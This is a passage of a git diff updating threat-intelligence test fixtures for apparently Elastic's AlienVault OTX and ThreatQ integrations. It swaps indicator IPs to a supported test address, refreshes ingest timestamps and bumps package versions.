"indicator": { "type": "ipv4-addr", - "ip": "198.211.116.199" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549961343Z", - "original": "{\"indicator\":\"198.211.116.199\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2136050161}", + "ingested": "2021-12-09T13:49:09.053781600Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2136050161}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1659,12 +1659,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "203.176.135.102" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549965511Z", - "original": "{\"indicator\":\"203.176.135.102\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2136079568}", + "ingested": "2021-12-09T13:49:09.053787500Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2136079568}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1687,7 +1687,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549969338Z", + "ingested": "2021-12-09T13:49:09.053791800Z", "original": "{\"indicator\":\"fotmailz.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2137741373}", "category": "threat", "type": "indicator", @@ -1711,7 +1711,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549973345Z", + "ingested": "2021-12-09T13:49:09.053796400Z", "original": "{\"indicator\":\"pori89g5jqo3v8.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2137741468}", "category": "threat", "type": "indicator", @@ -1735,7 +1735,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549977233Z", + "ingested": "2021-12-09T13:49:09.053800900Z", "original": "{\"indicator\":\"sebco.co.ke\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2178708355}", "category": "threat", "type": "indicator", @@ -1755,12 +1755,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "177.74.232.124" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549980880Z", - "original": "{\"indicator\":\"177.74.232.124\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2180669102}", + "ingested": "2021-12-09T13:49:09.053822500Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2180669102}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1783,7 +1783,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549986069Z", + "ingested": "2021-12-09T13:49:09.053828200Z", "original": "{\"indicator\":\"chishir.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2186034800}", "category": "threat", "type": "indicator", @@ -1807,7 +1807,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549990117Z", + "ingested": "2021-12-09T13:49:09.053832200Z", "original": "{\"indicator\":\"kostunivo.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2186034803}", "category": "threat", "type": "indicator", @@ -1831,7 +1831,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549994144Z", + "ingested": "2021-12-09T13:49:09.053836900Z", "original": "{\"indicator\":\"mangoclone.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2186034805}", "category": "threat", "type": "indicator", @@ -1855,7 +1855,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550016176Z", + "ingested": "2021-12-09T13:49:09.053840800Z", "original": "{\"indicator\":\"onixcellent.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2186034807}", "category": "threat", "type": "indicator", @@ -1883,7 +1883,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550024201Z", + "ingested": "2021-12-09T13:49:09.053845400Z", "original": "{\"indicator\":\"fc0efd612ad528795472e99cae5944b68b8e26dc\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":2186034891}", "category": "threat", "type": "indicator", @@ -1911,7 +1911,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550029341Z", + "ingested": "2021-12-09T13:49:09.053849400Z", "original": "{\"indicator\":\"24d4bbc982a6a561f0426a683b9617de1a96a74a\",\"description\":null,\"title\":\"Sf:ShellCode-DZ\\\\ [Trj]\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":2186034903}", "category": "threat", "type": "indicator", @@ -1939,7 +1939,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550034390Z", + "ingested": "2021-12-09T13:49:09.053854600Z", "original": "{\"indicator\":\"fa98074dc18ad7e2d357b5d168c00a91256d87d1\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":2186034912}", "category": "threat", "type": "indicator", @@ -1967,7 +1967,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550038848Z", + "ingested": "2021-12-09T13:49:09.053858900Z", "original": "{\"indicator\":\"e5dc7c8bfa285b61dda1618f0ade9c256be75d1a\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":2186034924}", "category": "threat", "type": "indicator", @@ -1987,12 +1987,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "96.9.77.142" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.550042856Z", - "original": "{\"indicator\":\"96.9.77.142\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2189036445}", + "ingested": "2021-12-09T13:49:09.053863900Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2189036445}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2009,12 +2009,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "36.89.106.69" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.550047244Z", - "original": "{\"indicator\":\"36.89.106.69\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2189036446}", + "ingested": "2021-12-09T13:49:09.053869700Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2189036446}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2031,12 +2031,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "96.9.73.73" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.550050751Z", - "original": "{\"indicator\":\"96.9.73.73\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2190596263}", + "ingested": "2021-12-09T13:49:09.053875600Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2190596263}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2064,7 +2064,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550054528Z", + "ingested": "2021-12-09T13:49:09.053881300Z", "original": "{\"indicator\":\"10ec3571596c30b9993b89f12d29d23c\",\"description\":\"MD5 of 9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6\",\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":2192837907}", "category": "threat", "type": "indicator", @@ -2092,7 +2092,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550059808Z", + "ingested": "2021-12-09T13:49:09.053887200Z", "original": "{\"id\":73,\"indicator\":\"http://www.playboysplus.com\",\"type\":\"URL\",\"title\":null,\"description\":null,\"content\":\"\"}", "category": "threat", "type": "indicator", @@ -2120,7 +2120,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550063665Z", + "ingested": "2021-12-09T13:49:09.053893300Z", "original": "{\"id\":74,\"indicator\":\"http://join.playboysplus.com/signup/\",\"type\":\"URL\",\"title\":null,\"description\":null,\"content\":\"\"}", "category": "threat", "type": "indicator", @@ -2150,7 +2150,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550067282Z", + "ingested": "2021-12-09T13:49:09.053899100Z", "original": "{\"id\":970,\"indicator\":\"http://api.vk.com/method/wall.get?count=1\u0026owner_id=-81972386\",\"type\":\"URL\",\"title\":null,\"description\":null,\"content\":\"\"}", "category": "threat", "type": "indicator", diff --git a/packages/ti_otx/manifest.yml b/packages/ti_otx/manifest.yml index 4cbb926c254..e60ee97782e 100644 --- a/packages/ti_otx/manifest.yml +++ b/packages/ti_otx/manifest.yml @@ -1,6 +1,6 @@ name: ti_otx title: AlienVault OTX -version: 1.0.2 +version: 1.0.3 release: ga description: Collect threat intelligence from AlienVault OTX with Elastic Agent. type: integration diff --git a/packages/ti_threatq/changelog.yml b/packages/ti_threatq/changelog.yml index d209c63fd69..21fdde201f4 100644 --- a/packages/ti_threatq/changelog.yml +++ b/packages/ti_threatq/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.0.1" changes: - description: Bumping minimum version diff --git a/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log b/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log index a99543a40ed..c7990384244 100644 --- a/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log +++ b/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log @@ -1,10 +1,10 @@ -{"adversaries":[],"attributes":[{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1877,"indicator_id":336,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1878,"indicator_id":336,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"MP"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1879,"indicator_id":336,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Saipan"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1880,"indicator_id":336,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1881,"indicator_id":336,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1882,"indicator_id":336,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"1ece659dcec98b1e1141160b55655c96","id":336,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":336,"indicator_id":336,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.44.202.220"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1883,"indicator_id":337,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1884,"indicator_id":337,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1885,"indicator_id":337,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1886,"indicator_id":337,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1887,"indicator_id":337,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1888,"indicator_id":337,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Sacramento"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"73c98d43519990c841a5d022546fedd4","id":337,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":337,"indicator_id":337,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.94.155.176"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1889,"indicator_id":338,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1890,"indicator_id":338,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1891,"indicator_id":338,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1892,"indicator_id":338,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1893,"indicator_id":338,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"New York"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1894,"indicator_id":338,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"a9c6773919112627495d87c51fe89b15","id":338,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":338,"indicator_id":338,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.42.81.68"} -{"adversaries":[],"attributes":[{"attribute_id":8,"created_at":"2020-09-11 14:35:43","id":184,"indicator_id":34,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"4"},{"attribute_id":6,"created_at":"2020-09-11 14:35:43","id":185,"indicator_id":34,"name":"AlienVault Revision","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"3"},{"attribute_id":3,"created_at":"2020-09-11 14:35:43","id":186,"indicator_id":34,"name":"Description","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"Malicious Host"},{"attribute_id":7,"created_at":"2020-09-11 14:35:43","id":187,"indicator_id":34,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"2"}],"class":"network","created_at":"2020-09-11 14:35:41","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:02","hash":"56f3cb07a9055f52947bb4c4244f762d","id":34,"published_at":"2020-09-11 14:35:41","score":4,"sources":[{"created_at":"2020-09-11 14:35:43","creator_source_id":12,"id":34,"indicator_id":34,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:43","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:35:49"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"37.17.250.101"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1901,"indicator_id":340,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1902,"indicator_id":340,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1903,"indicator_id":340,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1904,"indicator_id":340,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1905,"indicator_id":340,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1906,"indicator_id":340,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Sacramento"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"97624a37200db6ba0bcfce8c9c28f527","id":340,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":340,"indicator_id":340,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.94.129.203"} -{"adversaries":[],"attributes":[{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1907,"indicator_id":341,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1908,"indicator_id":341,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1909,"indicator_id":341,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1910,"indicator_id":341,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Houston"},{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1911,"indicator_id":341,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1912,"indicator_id":341,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"56a1917632c03f230c5645f432e71495","id":341,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":341,"indicator_id":341,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00","provider":"testprovider","tlp_name":"testtlp"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.216.117.22"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1913,"indicator_id":342,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1914,"indicator_id":342,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Fort Lauderdale"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1915,"indicator_id":342,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1916,"indicator_id":342,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1917,"indicator_id":342,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1918,"indicator_id":342,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"6de45834c2a81597b59a91ead4fbdf59","id":342,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":342,"indicator_id":342,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.80.70.115"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1919,"indicator_id":343,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1920,"indicator_id":343,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Pompano Beach"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1921,"indicator_id":343,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1922,"indicator_id":343,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1923,"indicator_id":343,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1924,"indicator_id":343,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"994a4586b27e46db67a59220ab6dd73f","id":343,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":343,"indicator_id":343,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.65.79.99"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1937,"indicator_id":346,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1938,"indicator_id":346,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1939,"indicator_id":346,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1940,"indicator_id":346,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1941,"indicator_id":346,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Little Elm"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1942,"indicator_id":346,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"40e81e10007099902cf40cfe3a8227dc","id":346,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":346,"indicator_id":346,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.199.22.46"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1943,"indicator_id":347,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1944,"indicator_id":347,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1945,"indicator_id":347,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1946,"indicator_id":347,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1947,"indicator_id":347,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Dallas"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1948,"indicator_id":347,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"418a88a2a1bac6980a7d83e6b2b2a27d","id":347,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":347,"indicator_id":347,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 